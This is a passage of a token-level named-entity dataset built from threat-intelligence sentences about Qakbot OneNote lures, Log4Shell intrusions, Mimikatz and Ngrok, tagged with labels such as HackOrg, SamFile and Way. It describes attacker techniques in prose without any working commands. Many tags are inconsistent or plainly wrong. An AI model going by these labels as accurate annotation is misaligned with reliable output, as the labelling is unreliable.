"the", - "customized", - "packet", - "size", - "using", - "a", - "XOR", - "value." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversary", - "exploited", - "a", - "web-facing", - "server", - "with", - "application" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actor", - "established", - "initial", - "access", - "by", - "compromising", - "the", - "victim’s", - "web", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tools", - "were", - "transferred", - "to", - "a", - "compromised", - "web-facing", - "server" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversary", - "browsed", - "several", - "locations", - "to", - "search", - "for", - "the", - "data", - "they", - "were", - "after." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "Rotten/Bad", - "Potato", - "to", - "elevate", - "user", - "rights", - "by", - "abusing", - "API", - "calls", - "in", - "the", - "Operating", - "System." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "including", - "adding", - "of", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "and", - "lateral", - "movement/execution", - "of", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attackers", - "would", - "launch", - "a", - "lateral", - "movement", - "phase,", - "using", - "default", - "Windows", - "credentials" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "a", - "network", - "recognition", - "process", - "to", - "find", - "the", - "IP", - "address", - "of", - "each", - "of", - "the", - "ATMs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "variety", - "of", - "encryption", - "schemes", - "and", - "symmetric", - "keys." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "to", - "install", - "AnyDesk", - "and", - "provide", - "remote", - "access", - "for", - "the", - "“technician”", - "to", - "install", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "All", - "captured", - "information", - "from", - "the", - "transaction", - "is", - "saved", - "to", - "an", - "encrypted", - "file", - "placed", - "in", - "a", - "directory", - "previously", - "set", - "by", - "the", - "malware", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Those", - "files", - "will", - "later", - "be", - "sent", - "to", - "the", - "malware", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Captured", - "data", - "stored", - "in", - "the", - "uploader", - "C2" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "all", - "cab", - "files", - "generated", - "from", - "the", - "stolen", - "transactions", - "to", - "the", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StartSendScreen,", - "StopSendScreen" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "StartSendScreen", - "Start", - "screen", - "capture", - "StopSendScreen", - "Stop", - "screen", - "capture" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Download", - "a", - "file", - "from", - "the", - "remote", - "server" - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "StartDownload,", - "StopDownload." - ], - "ner_tags": [ - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "Shell", - "Execute", - "a", - "specified", - "command", - "via", - "CMD" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "files", - "are", - "sent", - "through", - "an", - "HTTP", - "POST", - "request." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Add", - "the", - "process", - "to", - "a", - "startup", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "OneNote", - "documents", - "to", - "entice", - "users", - "to", - "click", - "on", - "an", - "embedded", - "file", - "to", - "download", - "and", - "execute" - ], - "ner_tags": [ - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "fake", - "message", - "to", - "lure", - "users", - "to", - "execute", - "the", - "HTA", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "Upon", - "clicking", - "the", - "Open", - "button,", - "it", - "drops", - "the", - "HTA", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "it", - "prompts", - "the", - "user", - "with", - "a", - "fake", - "message", - "to", - "double-click", - "on", - "open", - "to", - "view", - "the", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "message", - "above", - "the", - "‘Open’", - "button", - "instructs", - "the", - "user", - "to", - "“double", - "click”", - "in", - "order", - "to", - "receive", - "the", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "malicious", - "document", - "is", - "delivered", - "in", - "either", - "zip", - "files", - "or", - "ISO", - "images", - "to", - "the", - "target", - "through", - "phishing", - "emails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "author", - "used", - "phishing", - "emails", - "to", - "deliver", - "malicious", - "OneNote", - "document", - "either", - "as", - "attachment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malicious", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upon", - "execution", - "of", - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "launched", - "by", - "cmd.exe" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "batch", - "file" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Embedded", - "Executable", - "Objects", - "In", - "OneNote" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "embedded", - "file", - "gets", - "executed", - "by", - "the", - "user" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FileData", - "member", - "of", - "the", - "FileDataStoreObject", - "is", - "the", - "key", - "member", - "that", - "holds", - "the", - "embedded", - "data", - "in", - "the", - "OneNote", - "document." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Embedded", - "data", - "in", - "Data", - "object" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OneNote", - "file", - "contains", - "an", - "embedded", - "HTA", - "attachment" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "OneNote", - "file", - "with", - "the", - "embedded", - "HTA", - "file" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "contains", - "the", - "“whoami”", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "make", - "use", - "of", - "the", - "curl", - "utility", - "to", - "download", - "Qakbot", - "and", - "then", - "execute", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "HTA", - "file", - "uses", - "curl", - "utility", - "to", - "download" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Curl", - "is", - "used", - "to", - "download", - "the", - "malicious", - "DLL", - "file" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "will", - "then", - "execute", - "the", - "downloaded", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "payload", - "from", - "the", - "Internet", - "and", - "executes", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Powershell", - "will", - "be", - "invoked", - "and", - "it", - "fetch", - "the", - "Qakbot", - "payload", - "from", - "Internet" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "powershell", - "to", - "download", - "the", - "payload" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "by", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "script", - "will", - "then", - "execute", - "the", - "downloaded", - "file", - "with", - "Rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "execute", - "it", - "with", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Obfuscated", - "HTA", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "HTA", - "file", - "contains", - "obfuscated", - "script" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "obfuscated", - "registry", - "is", - "then", - "read", - "by", - "MSHTA", - "and", - "the", - "obfuscated", - "code", - "is" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "obfuscated", - "content" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deobfuscated", - "HTA", - "content" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "code", - "is", - "de-obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "Decoded", - "instructions", - "in", - "dropper" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "base64", - "decoded", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "deletes", - "the", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "registry", - "key", - "in", - "HKEY_CURRENT_USER\\SOFTWARE\\" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "A", - "closer", - "look", - "at", - "the", - "document", - "reveals", - "the", - "graphical", - "elements", - "are", - "all", - "images", - "placed", - "in", - "a", - "layered", - "style", - "by", - "the", - "malicious", - "actor." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "enumerate", - "files", - "and", - "folders" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "then", - "performs", - "SQL", - "queries", - "to", - "retrieve", - "files,", - "file", - "size,", - "folders" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Many", - "of", - "the", - "hosts", - "used", - "to", - "support", - "these", - "second-stage", - "operations", - "hosted", - "RDP", - "services" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "can", - "run", - "commands", - "that", - "will", - "download", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "web", - "shell", - "with", - "filenames", - "that", - "masquerade", - "as", - "human.aspx,", - "which", - "is", - "a", - "legitimate", - "component", - "of", - "the", - "MOVEit", - "Transfer", - "software." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "several", - "POST", - "requests" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "large", - "volumes", - "of", - "files", - "have", - "been", - "stolen", - "from", - "victims'", - "MOVEit", - "transfer", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "also", - "moved", - "laterally", - "to", - "the", - "domain", - "controller,", - "compromised", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "implanted", - "Ngrok", - "reverse", - "proxies" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Ngrok", - "to", - "proxy", - "RDP", - "connections", - "and", - "to", - "perform", - "command", - "and", - "control." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "exploited", - "Log4Shell", - "[T1190]", - "for", - "initial", - "access", - "[TA0001]", - "to", - "the", - "organization’s", - "unpatched", - "VMware", - "Horizon", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "exploited", - "Log4Shell", - "for", - "initial", - "access", - "to", - "the", - "organization’s", - "VMware", - "Horizon", - "server." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "added", - "an", - "exclusion", - "rule", - "to", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "added", - "an", - "exclusion", - "rule", - "to", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "added", - "an", - "exclusion", - "rule", - "to", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "The", - "tool", - "allowlisted", - "the", - "entire", - "c:\\drive,", - "enabling", - "the", - "actors", - "to", - "bypass", - "virus", - "scans", - "for", - "tools" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "manually", - "disabled", - "Windows", - "Defender", - "via", - "the", - "GUI." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "exclusion", - "rule", - "allowlisted", - "the", - "entire", - "c:\\drive,", - "enabling", - "threat", - "actors", - "to", - "download", - "tools", - "to", - "the", - "c:\\drive", - "without", - "virus", - "scans." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "manually", - "disabled", - "Windows", - "Defender", - "via", - "the", - "Graphical", - "User", - "Interface", - "(GUI)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Scheduled", - "Task", - "was", - "named", - "RuntimeBrokerService.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "created", - "a", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors’", - "exploit", - "payload", - "created", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "used", - "RDP" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RDP", - "sessions" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "actors", - "leveraged", - "RDP", - "to", - "propagate", - "to", - "several", - "hosts", - "within", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "RDP", - "to", - "move", - "laterally", - "to", - "multiple", - "hosts", - "on", - "the", - "network." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "connections" - ], - "ner_tags": [ - "B-Org", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "built-in", - "Windows", - "user", - "account", - "DefaultAccount", - "[T1078.001]", - "to", - "move", - "laterally" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "built-in", - "Windows", - "user", - "account", - "DefaultAccount." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "–", - "a", - "credential", - "theft", - "tool." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "then", - "executed", - "Mimikatz", - "on", - "VDI-KMS", - "to", - "harvest", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "was", - "observed", - "attempting", - "to", - "dump", - "the", - "Local", - "Security", - "Authority", - "Subsystem", - "Service", - "(LSASS)", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "trying", - "to", - "dump", - "LSASS", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "used", - "Mimikatz", - "to", - "harvest", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ngrok", - "–", - "a", - "reverse", - "proxy", - "tool", - "for", - "proxying", - "an", - "internal", - "service", - "out", - "onto", - "an", - "Ngrok", - "domain" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "were", - "able", - "to", - "proxy", - "[T1090]", - "RDP", - "sessions,", - "which", - "were", - "only", - "observable", - "on", - "the", - "local", - "network" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "downloaded", - "the", - "following", - "tools" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "next", - "stage", - "and", - "execute", - "it" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "exploit", - "payload", - "then", - "downloaded", - "mdeploy.text" - ], - "ner_tags": [ - "O", - "B-Exp", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "downloaded", - "malware", - "and", - "multiple", - "tools", - "to", - "the", - "network" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "as", - "outgoing", - "HTTPS", - "port", - "443", - "connections" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actors", - "removed", - "malicious", - "file", - "mde.ps1", - "from", - "the", - "dis." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "removed", - "mde.ps1", - "from", - "the", - "disk" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "$BASE64", - "encoded", - "payload" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "recording", - "files", - "to", - "be", - "uploaded", - "when", - "their", - "download", - "is", - "requested", - "by", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "uploads", - "it", - "back", - "to", - "the", - "server." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uploads", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Upload", - "a", - "recording", - "file", - "with", - "a", - "specified", - "name", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "data", - "to", - "be", - "exfiltrated", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "data", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sends", - "the", - "shellcode", - "execution", - "results", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "next", - "loader", - "stage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "it" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypts" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "decryption", - "procedure" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypts" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "shellcode", - "decrypts" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "decrypting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "Orchestrator" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "the", - "directory", - "path" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "hidden", - "page" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "them", - "on", - "the", - "fly." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "it", - "with", - "XOR" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypts", - "the", - "Trojan", - "with", - "a", - "XOR-based", - "cipher" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "decryption", - "key" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "Trojan", - "loader", - "into", - "exe." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "injected", - "to", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "injects", - "the", - "ProcessWorm", - "into", - "all", - "processes", - "running", - "on", - "the", - "system" - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Features", - "I-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "itself", - "into", - "processes" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "ProcessWorm", - "if", - "needed." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "ProcessWorm", - "into", - "processes" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "injected", - "into", - "all", - "running", - "processes." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injecting", - "code" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "injected", - "Trojan", - "loader" - ], - "ner_tags": [ - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "collects", - "specific", - "system", - "information" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Returns", - "information", - "about", - "the", - "machine’s", - "BIOS." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 